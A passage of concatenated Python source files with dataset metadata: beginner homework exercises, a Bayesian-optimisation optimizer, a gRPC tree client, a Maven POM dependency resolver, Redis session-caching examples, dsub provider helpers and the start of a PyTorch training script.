time, maybe\r\n# any year at random between 1930 and 1950.\r\n#You can’t stop talking to Grandma until you shout BYE. \r\n\r\nimport random\r\nphrase = \" \"\r\nwhile phrase !=\"BYE\":\r\n    phrase = input(\"Tell something to grandma?\")\r\n    if phrase == \"BYE\":\r\n        break\r\n    if not phrase.isupper():\r\n        print(\"HUH?! SPEAK UP, GIRL!\")\r\n    else:\r\n        year = random.randrange(1930, 1950, 1)\r\n        print(f\"NO, NOT SINCE {year}!\")\r\nprint(\"Goodbye!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#What if Grandma doesn’t want you to leave? When you shout BYE, she could pretend not to hear you. \r\n#Change your previous program so that you have to shout BYE three times in a row. Make sure to test your program: \r\n#if you shout BYE three times but not in a row, you should still be talking to Grandma.\r\n\r\nimport random\r\nphrase = \" \"\r\n#counter counts consecutive \"BYE\" phrases\r\ncounter = 0\r\n#exit controls the while loop. \r\nexit = 0\r\nwhile exit !=1:\r\n    phrase = input(\"Tell something to grandma?\")\r\n    if (phrase == \"BYE\") and (counter == 2):\r\n        break\r\n    elif phrase == \"BYE\":\r\n        counter=counter +1\r\n    else:\r\n        counter=0\r\n    if not phrase.isupper():\r\n        print(\"HUH?! SPEAK UP, GIRL!\")\r\n    else:\r\n        year = random.randrange(1930, 1950, 1)\r\n        print(f\"NO, NOT SINCE {year}!\")\r\nprint(\"Goodbye!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a program that asks for a starting year and an ending year and then puts all the leap years \r\n#between them (and including them, if they are also leap years). Leap years are years divisible by \r\n#4 (like 1984 and 2004). However, years divisible by 100 are not leap years (such as 1800 and 1900) \r\n#unless they are also divisible by 400 (such as 1600 and 2000, which were in fact leap years). 
What a mess!\r\n\r\nstartyear = int(input(\"Enter starting year:\"))\r\nendyear = int(input(\"Enter ending year:\"))\r\ndef leapyr(n):\r\n\t#divisible by 4 and not divisible by 100, or divisible by 400\r\n    if (n%4==0 and n%100!=0) or (n%4==0 and n%400==0):\r\n        print (f\"{n} is a leap year.\")\r\n\r\nfor year in range(startyear, endyear+1):\r\n    leapyr(year)\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Go for a walk, look around the park, try to count something. Anything! \r\n#And write a program about it. e.g. number of stairs, steps, windows, leaves estimated \r\n#in the park, kids, dogs, estimate your books by bookshelf, toiletries, wardrobe.\r\n\r\nprint(f\"Number of stairs is {3*10*2}\")\r\n\r\n#Write the program that asks us to type as many words as we want (one word per line, continuing \r\n#until we just press Enter on an empty line) and then repeats the words back to us in alphabetical order. \r\n#Make sure to test your program thoroughly; for example, does hitting Enter on an empty line always exit your program? \r\n#Even on the first line? And the second? Hint: There’s a lovely array method that will give you a sorted version of \r\n#an array: sorted(). Use it!\r\narray = []\r\nwhile True:\r\n    word = input(\"Enter a word please:\")\r\n    if len(word)==0:\r\n        break\r\n    else:\r\n        array.append(word)\r\nprint(sorted(array))\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a table of contents program here. Start the program with a list holding all of the information for your \r\n#table of contents (chapter names, page numbers, and so on). Then print out the information from the list in a \r\n#beautifully formatted table of contents. Use string formatting such as left align, right align, center.\r\n\r\nlist = [\"Table of Contents\",\"Chapter 1: Getting Started\",\"page 1\", \"Chapter 2: Numbers\",\"page 9\",\"Chapter 3: Letters\",\"page 13\"]\r\n\r\nprint(list[0])\r\nprint(\"\")\r\nprint(list[1].ljust(30,\" \")+list[2].ljust(20,\" \"))\r\nprint(list[3].ljust(30,\" \")+list[4].ljust(20,\" \"))\r\nprint(list[5].ljust(30,\" \")+list[6].ljust(20,\" \"))\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a function that prints out \"moo\" n times.\r\ndef moo(n):\r\n    for i in range(n):\r\n        print(\"moo\")\r\n# int() first: input() returns a string, so only compare after converting\r\nnumber=input(\"Enter the number of times moo is printed:\")\r\ntry:\r\n    val = int(number)\r\n    if val<=0:\r\n        print(\"You did not enter a positive integer!\")\r\n    else:\r\n        moo(val)\r\nexcept ValueError:\r\n    print(\"You did not enter an integer!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a method that when passed an integer between 1 and 3000 (or so) returns a string containing the proper old-school \r\n#Roman numeral. In other words, old_roman_numeral 4 should return 'IIII'. Make sure to test your method on a bunch of \r\n#different numbers. Hint: Use the integer division and modulus methods. 
For reference, these are the values of the letters \r\n#used: I = 1 V = 5 X = 10 L = 50 C = 100 D = 500 M = 1000\r\ndef roman(n):\r\n    romanlit =\"\"\r\n    while n!=0:\r\n        if n>=1000:\r\n            romanlit = romanlit + (n//1000)*\"M\"\r\n            n=n-1000*(n//1000)\r\n        elif n>=500:\r\n            romanlit = romanlit + (n//500)*\"D\"\r\n            n=n-500*(n//500)\r\n        elif n>=100:\r\n            romanlit = romanlit + (n//100)*\"C\"\r\n            n=n-100*(n//100)\r\n        elif n>=50:\r\n            romanlit = romanlit + (n//50)*\"L\"\r\n            n=n-50*(n//50)\r\n        elif n>=10:\r\n            romanlit = romanlit + (n//10)*\"X\"\r\n            n=n-10*(n//10)\r\n        elif n>=5:\r\n            romanlit = romanlit + (n//5)*\"V\"\r\n            n=n-5*(n//5)\r\n        else:\r\n            romanlit = romanlit + (n)*\"I\"\r\n            n=n-1*(n//1)\r\n\r\n    return romanlit\r\n\r\n# convert inside the try block so a non-integer input is reported instead of crashing\r\nnumber=input(\"Enter a number:\")\r\ntry:\r\n    val = int(number)\r\n    if val<=0:\r\n        print(\"You did not enter a positive integer!\")\r\n    else:\r\n        print(f\"Roman numeral for this number is: {roman(val)}\")\r\nexcept ValueError:\r\n    print(\"You did not enter an integer!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Eventually, someone thought it would be terribly clever if putting a smaller number before a larger one meant you had to \r\n#subtract the smaller one. As a result of this development, you must now suffer. Rewrite your previous method to return the \r\n#new-style Roman numerals so when someone calls roman_numeral 4, it should return 'IV', 90 should be 'XC' etc.\r\ndef roman(n):\r\n    romanlit =\"\"\r\n    while n!=0:\r\n        if n>=1000:\r\n            romanlit = romanlit + (n//1000)*\"M\"\r\n            n=n-1000*(n//1000)\r\n        elif n>=900:\r\n            romanlit = romanlit + (n//900)*\"CM\"\r\n            n=n-900*(n//900)\r\n        elif n>=500:\r\n            romanlit = romanlit + (n//500)*\"D\"\r\n            n=n-500*(n//500)\r\n        elif n>=400:\r\n            romanlit = romanlit + (n//400)*\"CD\"\r\n            n=n-400*(n//400)\r\n        elif n>=100:\r\n            romanlit = romanlit + (n//100)*\"C\"\r\n            n=n-100*(n//100)\r\n        elif n>=90:\r\n            romanlit = romanlit + (n//90)*\"XC\"\r\n            n=n-90*(n//90)\r\n        elif n>=50:\r\n            romanlit = romanlit + (n//50)*\"L\"\r\n            n=n-50*(n//50)\r\n        elif n>=40:\r\n            romanlit = romanlit + (n//40)*\"XL\"\r\n            n=n-40*(n//40) \r\n        elif n>=10:\r\n            romanlit = romanlit + (n//10)*\"X\"\r\n            n=n-10*(n//10)\r\n        elif n>=9:\r\n            romanlit = romanlit + (n//9)*\"IX\"\r\n            n=n-9*(n//9) \r\n        elif n>=5:\r\n            romanlit = romanlit + (n//5)*\"V\"\r\n            n=n-5*(n//5)\r\n        elif n>=4:\r\n            romanlit = romanlit + (n//4)*\"IV\"\r\n            n=n-4*(n//4) \r\n        else:\r\n            romanlit = romanlit + (n)*\"I\"\r\n            n=n-1*(n//1)\r\n\r\n    return romanlit\r\n\r\nnumber=input(\"Enter a number:\")\r\ntry:\r\n    val = int(number)\r\n    if val<=0:\r\n        print(\"You did not enter a positive integer!\")\r\n    else:\r\n        print(f\"Roman numeral for this number is: {roman(val)}\")\r\nexcept ValueError:\r\n    print(\"You did not enter an integer!\")\r\n\r\nx=input (\"End of homework for week 1. 
Thanks for reviewing!\")","sub_path":"summer-of-code/week-01/wk1-homework-submissions/soc01hw-Ana-Sustic.py","file_name":"soc01hw-Ana-Sustic.py","file_ext":"py","file_size_in_byte":11982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495065439","text":"import gpflow\nimport numpy as np\nimport sys,os\nsys.path.insert(0, os.path.join(sys.path[0], '..'))\nfrom tfbo.utils.import_modules import import_attr\nfrom tfbo.optimizers.optimizer_class import optimizer\nfrom tfbo.components.initializations import initialize_m_models\nfrom tfbo.components.block_diag_initializations import block_diag_initialize_acquisition\nfrom tfbo.components.block_diag_initializations import bloc_diag_initialize_models\nfrom tfbo.models.gplvm_models import Ort_NN\nfrom scipy.optimize import minimize\nfrom scipy.stats import norm\n\n\nclass NN_bo_optimizer(optimizer):\n def __init__(self, xy_start, proj_dim, objective, loss, **kwargs):\n super().__init__(xy_start, proj_dim, objective, loss)\n # self.initialize_normalization()\n self.initialize_probit()\n self.identity = False\n self.Mo_dim = int(3)\n self.decomposition = [list(np.arange(start=i*self.Mo_dim, stop=(i+1)*self.Mo_dim, step=1)) for i in\n range(int(np.floor(self.input_dim/self.Mo_dim)))]\n self.Xnn = None\n self.latent_bound = []\n self.latent_grid = []\n\n\n def initialize_modelM(self):\n\n nn = Ort_NN(dims=[self.Xprobit.shape[1], 20, self.proj_dim], N=0, proj_dim=0,\n name=None)\n\n k_list, gp_nnjoint = bloc_diag_initialize_models(x=np.copy(self.Xprobit), y=np.copy(self.Ynorm),\n input_dim=self.proj_dim,\n model='joint',\n kernel='Matern52',\n ARD=True,\n nn=nn,\n decomp=self.decomposition) # last kernel is the Y kernel\n\n # k2_list, gp_nnjoint_test = initialize_m_models(x=np.copy(self.Xprobit), y=np.copy(self.Ynorm),\n # input_dim=self.proj_dim,\n # model='joint',\n # kernel='Matern52',\n # ARD=True,\n # nn=nn,\n # decomp=self.decomposition) # last kernel is the Y kernel\n\n gp_nnjoint.likelihood.variance = 1e-06 # 0.001\n # gp_nnjoint_test.likelihood.variance = 1e-06\n\n return k_list, gp_nnjoint, nn\n\n\n def generate_x(self, x_proj, gp_joint):\n\n # mean_new = gp_joint.predict_x(x_proj)\n mean_new, post_cov = gp_joint.predict_x(x_proj)\n joint_new = np.zeros(shape=[1, self.Xprobit.shape[1]])\n joint_var = np.zeros(shape=[1, self.Xprobit.shape[1]])\n for decomp_jj, jj in zip(self.decomposition, list(range(len(self.decomposition)))):\n joint_new[:, decomp_jj] = np.copy(mean_new[jj, :, 0])\n joint_var[:, decomp_jj] = np.copy(np.diag(post_cov[jj, :, :]))\n\n joint_var = np.clip(np.abs(joint_var), a_min=1e-06, a_max=1e09)\n m = 0.\n v = 1.\n z = (joint_new - m) / (v * np.sqrt(1. + joint_var / (v ** 2.))) # Equation (3.82) GPML book = Equation (3.25) GPML book\n x_out = norm.cdf(z)\n if np.isnan(x_out.max()):\n print('joint_new')\n print(joint_new)\n print('joint_var')\n print(joint_var)\n print('z')\n print(z)\n print('mean_new')\n print(mean_new)\n print('post_cov')\n print(post_cov)\n print('x_out')\n print(x_out)\n print('alpha_reshape')\n # x_new = (joint_new * self.X_std) + self.X_mean # originally mapped to Xnorm\n # x_out = np.clip(x_out, a_min=0., a_max=1.)\n return x_out\n\n\n def update_latent_bounds(self, opt_config):\n m_min = np.clip(np.min(self.Xnn, axis=0, keepdims=True) - 0.2, a_min=0., a_max=1.) 
# refined\n m_max = np.clip(np.max(self.Xnn, axis=0, keepdims=True) + 0.2, a_min=0., a_max=1.)\n self.latent_bound = []\n for i in range(self.proj_dim):\n self.latent_bound += [(m_min[0, i].copy(), m_max[0, i].copy())]\n # # uncomment if want to use L-BFGS-B with bounds on the optimization variable\n opt_config['bounds'] = self.latent_bound * self.num_init\n\n self.latent_grid = np.multiply(np.copy(self.grid), m_max - m_min) + m_min\n return opt_config\n\n\n def run(self, maxiters=20):\n opt_config = import_attr('tfbo/configurations', attribute='acquisition_opt') # check import configuration\n for j in range(maxiters):\n print('iteration: ', j)\n\n self.reset_graph()\n # initialize model\n k_list, gp_nnjoint, nn = self.initialize_modelM()\n try:\n gpflow.train.ScipyOptimizer().minimize(gp_nnjoint)\n except:\n try:\n gp_nnjoint.likelihood.variance = 1e-03\n gpflow.train.ScipyOptimizer().minimize(gp_nnjoint)\n except:\n print('Failure in optimization of hyper-parameters, reset to standard ones')\n\n Xnn = gp_nnjoint.nn.np_forward(self.Xprobit)\n self.Xnn = Xnn\n self.hyps.append(self.get_hyps(gp_nnjoint))\n\n # optimize the acquisition function within bounds\n kwargs = {'ymin': self.Ynorm.min()}\n acquisition = block_diag_initialize_acquisition(loss=self.loss, gpmodel=gp_nnjoint, **kwargs)\n opt_config = self.update_latent_bounds(opt_config)\n x_proj_tp1, acq_tp1 = self.minimize_acquisition(acquisition, opt_config)\n\n x_tp1 = self.generate_x(x_proj_tp1, gp_nnjoint)\n\n y_tp1 = self.evaluate(x_tp1)\n self.update_data(x_tp1, y_tp1)\n lik = []\n\n return self.data_x, self.data_y, self.hyps, lik\n\n def minimize_acquisition(self, acquisition, opt_config):\n\n acquisition_grid, acq_sum, acq_grad = acquisition(self.latent_grid)\n indices_sorted = np.argsort(acquisition_grid, axis=0)\n x_topk = np.ravel(np.copy(self.latent_grid[indices_sorted[:self.num_init, 0], :]))\n\n def acq_objective(self, xopt, acquisition):\n xopt_reshape = np.reshape(xopt, [self.num_init, self.proj_dim])\n acq_arr, acq_sum, acq_grad = acquisition(xopt_reshape)\n grad_reshape = np.ravel(acq_grad[0]) # check shape\n return acq_sum[0, 0], grad_reshape\n sum_acquisition_opt = lambda x: acq_objective(self=self, xopt=x, acquisition=acquisition)\n optimize_result = minimize(sum_acquisition_opt, x_topk, **opt_config)\n\n x_opt_all = np.reshape(optimize_result.x, newshape=[self.num_init, self.proj_dim])\n f_opt_all, f_sum, f_grad = acquisition(x_opt_all)\n x_opt = x_opt_all[f_opt_all.argmin(), :][None]\n f_opt = f_opt_all.min()[None, None]\n return x_opt, f_opt\n\n def evaluate(self, x_tp1):\n return self.objective.f(x_tp1, noisy=True, fulldim=self.identity)\n\n def update_data(self, x_new, y_new):\n self.data_x = np.concatenate([self.data_x, x_new], axis=0) # check shapes\n self.data_y = np.concatenate([self.data_y, y_new], axis=0)\n # self.initialize_normalization()\n self.initialize_probit()\n\n def get_hyps(self, gp):\n lengthscales = gp.kern.kernels[-1].lengthscales.read_value()\n kern_var = gp.kern.kernels[-1].variance.read_value()[None]\n noise_var = gp.likelihood.variance.read_value()[None]\n return np.concatenate([lengthscales, kern_var, noise_var], axis=0)","sub_path":"tfbo/optimizers/NN_bo_optimizer.py","file_name":"NN_bo_optimizer.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262007729","text":"from __future__ import print_function\nimport logging\nimport threading\n\nimport grpc\n\nfrom tree import Tree\nimport 
rpc_package.tree_pb2 as server\nfrom rpc_package.tree_pb2 import *\nfrom rpc_package.tree_pb2_grpc import TreeServiceStub\n\nCHANNEL = \"localhost:50000\"\n\n# This is the tree client object !!!!!!!\nclass treeClient():\n\n    def __init__(self, name, channel):\n        self._name = name\n        self._channel = channel = grpc.insecure_channel(channel)\n        self._stub = TreeServiceStub(channel)\n        self._tree = Tree(0.4)\n        threading.Thread(target=self.__listening_for_requests, daemon=True).start()\n\n    def __listening_for_requests(self):\n        for reply in self._stub.Stream(server.Empty()):\n            print(reply.message)\n            print(\"Received request from server! target client: \"+reply.client)\n            if self._name == reply.client:\n                print(\"Processing...\")\n                # check whether we should add a new item node\n                if reply.addNewItem:\n                    # client tree has a dummy root\n                    newNode = self._tree._addNode(self._tree._root, reply.trx[0])\n                # directly insert from the item node\n                self._tree.insertAndRecord(self._tree._root._children[reply.trx[0]],reply.trx[1:])\n            else:\n                print(\"Ignored.\")\n            print(f\"Tree at client {self._name}: \", self._tree)\n\n    def send_request(self, trx):\n        if trx:\n            request = rootAddRequest(client=self._name,trx=trx,message=\"This is \"+self._name+\" requesting adding trx to server.\")\n            reply = self._stub.add_note_root(request)\n\n            # for trx, msg in reply.message.items():\n            #     if msg[:6] == \"Append\":\n            #         self._tree.insert(self._tree._root,trx)\n            #         print(self._tree)\n            #         print(\"Add {}, current size {}\".format(trx, self._tree._size))\n            #     else:\n            #         print(self._tree)\n            #         print(\"Reroute to client {}\".format(msg[19:]))\n\n\n\ndef run():\n    # Tree service client is here !!!!!!\n    channel = CHANNEL\n    client_name = str(input(\"Please type your client name here: \"))\n    c = treeClient(client_name, channel)\n    while True:\n        client_input = str(input(\"The transaction you wanna add here (e.g. 
'ABCD'): \"))\n c.send_request(client_input)\n\n\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n run()\n","sub_path":"gRPC/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530371909","text":"\nimport bs4\nfrom bs4 import BeautifulSoup as bs\nfrom xml.dom.minidom import parse\n\n# Files created by us\nfrom Dependency import dependency\nfrom Resolve_Version import resolve_version\nfrom Resolve_GroupId import resolve_groupId\nfrom ProjectInfo import project\nfrom ParentInfo import parent\n\n\n\ndef get_deps_man_from_import_scope(main_pom_file, depm_fname, poms_base_dir, key, value, logf):\n\n\tdepm_path = poms_base_dir + depm_fname\n\n\ttry:\n\t\tdepm_tree = parse(depm_path)\n\texcept Exception as e:\n\t\tlogf.write(str(e) + \", -- Pom file %s does not exist when looked by the main pom file through dependencymanagement section --> %s.\\n\" %(depm_path, main_pom_file))\n\t\treturn\n\n\t# The main root to extract information\n\tdepm_root = bs(depm_tree.toxml(), 'lxml')\t\n\n\tproject_info = project(None, None, None)\n\n\tif depm_root.project.find_all('groupid', recursive=False):\n\t\troot_gid = depm_root.project.find_all('groupid', recursive=False)\n\t\tfor rid in root_gid:\n\t\t\tproject_info.set_groupId(rid.text)\n\n\n\tif depm_root.project.find_all('artifactid', recursive=False):\n\t\troot_aid = depm_root.project.find_all('artifactid', recursive=False)\n\t\tfor rid in root_aid:\n\t\t\tproject_info.set_artifactId(rid.text)\n\n\n\tif depm_root.project.find_all('version', recursive=False):\n\t\troot_vid = depm_root.project.find_all('version', recursive=False)\n\t\tfor rid in root_vid:\n\t\t\tproject_info.set_version(rid.text)\n\t\n\n\t# To keep parent information\n\tparent_info = parent(None, None, None, None)\n\thas_parent = False\n\n\t# if parent is not None:\n\tfor p in depm_root.project.find_all('parent', recursive=False):\n\t\tif type(p) == bs4.element.Tag:\t\n\t\t\thas_parent = True\n\t\t\tparent_info.set_groupId(p.find('groupid').text)\n\t\t\tparent_info.set_artifactId(p.find('artifactid').text)\n\t\t\tparent_info.set_version(p.find('version').text)\n\t\t\tparent_info.set_path(parent_info.get_groupId() + \"-\" + parent_info.get_artifactId() + \"-\" + parent_info.get_version() + \".pom\")\n\n\n\t# To handle if the project groupId and version not giving, then we use the parent groupId and version\t\n\tif project_info.get_groupId() is None:\n\t\tproject_info.set_groupId(parent_info.get_groupId())\n\tif project_info.get_version() is None:\n\t\tproject_info.set_version(parent_info.get_version())\t\n\n\n\tdepm_with_import_list = []\t\n\n\tdeps_manage = depm_root.project.find_all('dependencymanagement', recursive=False)\n\tif deps_manage: # Check if has dependency management section\n\t\tfor deps in deps_manage: # deps = dependecies\n\t\t\tif type(deps) ==bs4.element.Tag:\n\t\t\t\tfor dep in deps: # dep = dependency\n\t\t\t\t\tif type(dep) == bs4.element.Tag:\n\t\t\t\t\t\tfor d in dep:\n\t\t\t\t\t\t\tif type(d) == bs4.element.Tag:\n\n\t\t\t\t\t\t\t\tdepm = dependency(None, None, None, None)\n\n\t\t\t\t\t\t\t\tif d.find('groupid'):\n\t\t\t\t\t\t\t\t\tdepm.set_groupId(d.find('groupid').text)\n\t\t\t\t\t\t\t\tif d.find('artifactid'):\n\t\t\t\t\t\t\t\t\tdepm.set_artifactId(d.find('artifactid').text)\n\t\t\t\t\t\t\t\tif d.find('version'):\n\t\t\t\t\t\t\t\t\tdepm.set_version(d.find('version').text)\n\t\t\t\t\t\t\t\tif 
d.find('scope'):\n\t\t\t\t\t\t\t\t\tdepm.set_scope(d.find('scope').text)\n\n\t\t\t\t\t\t\t\tif depm.get_groupId()[0] == \"$\":\n\n\t\t\t\t\t\t\t\t\tdepm.set_groupId(resolve_groupId(depm_root, depm.get_groupId(), project_info.get_groupId(), parent_info.get_groupId()))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif depm.get_groupId() == value['gid'] and depm.get_artifactId() == value['aid'] and depm.get_version()[0] == '$' and depm.get_scope() != 'import':\n\n\t\t\t\t\t\t\t\t\tdepm.set_version(resolve_version(depm_root, depm.get_version(), project_info.get_version(), parent_info.get_version()))\n\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif depm.get_groupId() == value['gid'] and depm.get_artifactId() == value['aid'] and depm.get_scope() != \"import\":\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\treturn depm.get_version()\n\n\t\t\t\t\t\t\t\tif depm.get_scope() == \"import\":\n\n\t\t\t\t\t\t\t\t\tif depm.get_version()[0] == '$':\n\n\t\t\t\t\t\t\t\t\t\tdepm.set_version(resolve_version(depm_root, depm.get_version(), project_info.get_version(), parent_info.get_version()))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tdepm_fname = depm.get_groupId() + \"-\" + depm.get_artifactId() + \"-\" + depm.get_version() + \".pom\"\t\n\t\t\t\t\t\t\t\t\tdepm_with_import_list.append(depm_fname)\t\t\n\n\n\tfor iter_ in range(len(depm_with_import_list)):\n\t\tcapture_ = get_deps_man_from_import_scope(main_pom_file, depm_with_import_list[iter_], poms_base_dir, key, value, logf)\t\t\t\t\t\t\t\n\t\tif capture_ == None:\n\t\t\tcontinue\n\t\telse:\n\t\t\treturn capture_\t\n\n\tif has_parent:\n\t\treturn get_deps_man_from_import_scope(main_pom_file, parent_info.get_path(), poms_base_dir, key, value, logf)\t\t\n","sub_path":"src/GetDepsFromDepmImport.py","file_name":"GetDepsFromDepmImport.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453152369","text":"import redis\nimport time\nimport json\nimport argparse\n\n\ndef main(args):\n conn = redis.Redis(host='localhost', port=6379, db=0)\n\n if args.action == 'check_token':\n token = check_token(conn, args.token)\n print(token)\n elif args.action == 'update_token':\n update_token(conn, args.token, args.user, args.item)\n elif args.action == 'clean_full_sessions':\n clean_full_sessions(conn)\n elif args.action == 'add_to_cart':\n add_to_cart(conn, args.token, args.item, int(args.count))\n else:\n print(\"we don't recognize the action\")\n\n\ndef check_token(conn, token):\n return conn.hget('login:', token)\n\n\ndef update_token(conn, token, user, item=None):\n timestamp = time.time()\n conn.hset('login:', token, user)\n conn.zadd('recent:', {token: timestamp})\n if item:\n conn.zadd('viewed:' + token, {item: timestamp})\n conn.zremrangebyrank('viewed:' + token, 0, -26)\n # redis-py 3.x signature is zincrby(name, amount, value)\n conn.zincrby('viewed:', -1, item)\n\nQUIT = False\nLIMIT = 10000000\n\n\ndef clean_full_sessions(conn):\n while not QUIT:\n size = conn.zcard('recent:')\n if size <= LIMIT:\n time.sleep(1)\n continue\n\n end_index = min(size - LIMIT, 100)\n tokens = conn.zrange('recent:', 0, end_index - 1)\n session_keys = []\n for token in tokens:\n session_keys.append('viewed:' + token)\n session_keys.append('cart:' + token)\n\n conn.delete(*session_keys)\n conn.hdel('login:', *tokens)\n conn.zrem('recent:', *tokens)\n\n\ndef add_to_cart(conn, token, item, count):\n if count <= 0:\n # Redis has no HREM command; removing a hash field is HDEL\n conn.hdel('cart:' + token, item)\n else:\n conn.hset('cart:' + token, item, count)\n\n\n# the example code provided by the book for the following function is 
incomplete, so it is not tested\ndef cache_request(conn, request, callback):\n if not can_cache(conn, request):\n return callback(request)\n page_key = 'cache:' + hash_request(request)\n content = conn.get(page_key)\n if not content:\n content = callback(request)\n # redis-py 3.x signature is setex(name, time, value)\n conn.setex(page_key, 300, content)\n return content\n\n\ndef schedule_row_cache(conn, row_id, delay):\n conn.zadd('delay:', {row_id: delay})\n conn.zadd('schedule:', {row_id: time.time()})\n\n\ndef cache_rows(conn):\n while not QUIT:\n next = conn.zrange('schedule:', 0, 0, withscores=True)\n now = time.time()\n if not next or next[0][1] > now:\n time.sleep(.05)\n continue\n row_id = next[0][0]\n delay = conn.zscore('delay:', row_id)\n if delay <= 0:\n conn.zrem('delay:', row_id)\n conn.zrem('schedule:', row_id)\n conn.delete('inv:' + row_id)\n continue\n row = Inventory.get(row_id)\n conn.zadd('schedule:', {row_id: now + delay})\n conn.set('inv:' + row_id, json.dumps(row.to_dict()))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Python Redis Test')\n parser.add_argument('action')\n parser.add_argument('--token')\n parser.add_argument('--user')\n parser.add_argument('--item')\n parser.add_argument('--count')\n\n args = parser.parse_args()\n\n main(args)\n\n\"\"\"\npython3 src/web_application.py check_token --token token:1\npython3 src/web_application.py update_token --token token:1 --user user:1 --item item:1\npython3 src/web_application.py clean_full_sessions\npython3 src/web_application.py add_to_cart --token token:1 --item item:1 --count 10\n\"\"\"\n","sub_path":"src/web_application.py","file_name":"web_application.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490054280","text":"# Copyright 2016 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Interface for job providers.\"\"\"\n\nfrom . import google\nfrom . import local\nfrom . import test_fails\n\n\ndef get_provider(args):\n \"\"\"Returns a provider for job submission requests.\"\"\"\n\n provider = getattr(args, 'provider', 'google')\n\n if provider == 'google':\n return google.GoogleJobProvider(\n getattr(args, 'verbose', False),\n getattr(args, 'dry_run', False), args.project)\n elif provider == 'local':\n return local.LocalJobProvider()\n elif provider == 'test-fails':\n return test_fails.FailsJobProvider()\n else:\n raise ValueError('Unknown provider: ' + provider)\n\n\ndef add_provider_argument(parser):\n parser.add_argument(\n '--provider',\n default='google',\n choices=['local', 'google', 'test-fails'],\n help=\"\"\"Job service provider. Valid values are \"google\" (Google's\n Pipeline API) and \"local\" (local Docker execution). \"test-*\" providers\n are for testing purposes only.\"\"\",\n metavar='PROVIDER')\n\n\ndef get_dstat_provider_args(args):\n \"\"\"A string with the arguments to point dstat to the same provider+project.\"\"\"\n if args.provider == 'google':\n return ' --project %s' % args.project\n elif args.provider == 'local':\n return ' --provider local'\n elif args.provider == 'test-fails':\n return ''\n # New providers should add their dstat required arguments here.\n assert False\n return ''\n\n\ndef get_ddel_provider_args(args):\n \"\"\"A string with the arguments to point ddel to the same provider+project.\"\"\"\n # Change this if the two ever diverge.\n return get_dstat_provider_args(args)\n\n\ndef check_for_unsupported_flag(args):\n \"\"\"Raise an error if the provider doesn't support a provided flag.\"\"\"\n if args.label and args.provider not in ['test-fails', 'local', 'google']:\n raise ValueError(\n '--label is not supported by the \"%s\" provider.' 
% args.provider)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"dsub/providers/provider_base.py","file_name":"provider_base.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218034923","text":"import random\r\nimport numpy as np\r\nimport pickle\r\nfrom functions.nn import NeuralNetwork\r\nimport torch\r\nfrom torch import nn\r\nimport pandas as pd\r\nimport torch.utils.data as data_utils\r\nimport torchmetrics\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom torchinfo import summary\r\n\r\n# Script to train the neural network using datasets from files\r\n\r\n# Set random seed\r\nnp.random.seed(0)\r\nrandom.seed(0)\r\n\r\n# Get cpu or gpu device for training.\r\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\nprint(\"Using {} device\".format(device))\r\n\r\n# Set Neural Network parameters, Create an instance of NeuralNetwork, and move it to the device\r\nlearning_rate = 1e-4\r\n#base_lr = 1e-5\r\nepochs = 60\r\nbatch_size = 128\r\nshuffle = True\r\nn_layers = 4\r\nmodel = NeuralNetwork().to(device)\r\nloss_fn = nn.BCELoss()\r\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\r\n#scheduler = torch.optim.lr_scheduler.CyclicLR(optimizer, base_lr, learning_rate, cycle_momentum=False)\r\n#scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=15, gamma=0.1)\r\n\r\n# Open tensorboard\r\nwriter = SummaryWriter(\r\n log_dir='runs/TEST FINAL 2 - Lr{} - Batch{} - {}layers - leakyrelu'.format(learning_rate, batch_size, n_layers))\r\n\r\n# Print the model\r\nsummary(model, input_size=(1, 1030))\r\n\r\n# Detect anomaly\r\n# torch.autograd.set_detect_anomaly(True)\r\n\r\n\r\n# -------------------------------------------------------------------------------------------------\r\n# Prepare the datasets with all scenes\r\n# -------------------------------------------------------------------------------------------------\r\n\r\n# Select training scenes\r\nkitchens = [f\"FloorPlan{i}\" for i in range(1, 20)]\r\nliving_rooms = [f\"FloorPlan{200 + i}\" for i in range(1, 20)]\r\nbedrooms = [f\"FloorPlan{300 + i}\" for i in range(1, 20)]\r\nbathrooms = [f\"FloorPlan{400 + i}\" for i in range(1, 20)]\r\ntrain_scenes = kitchens 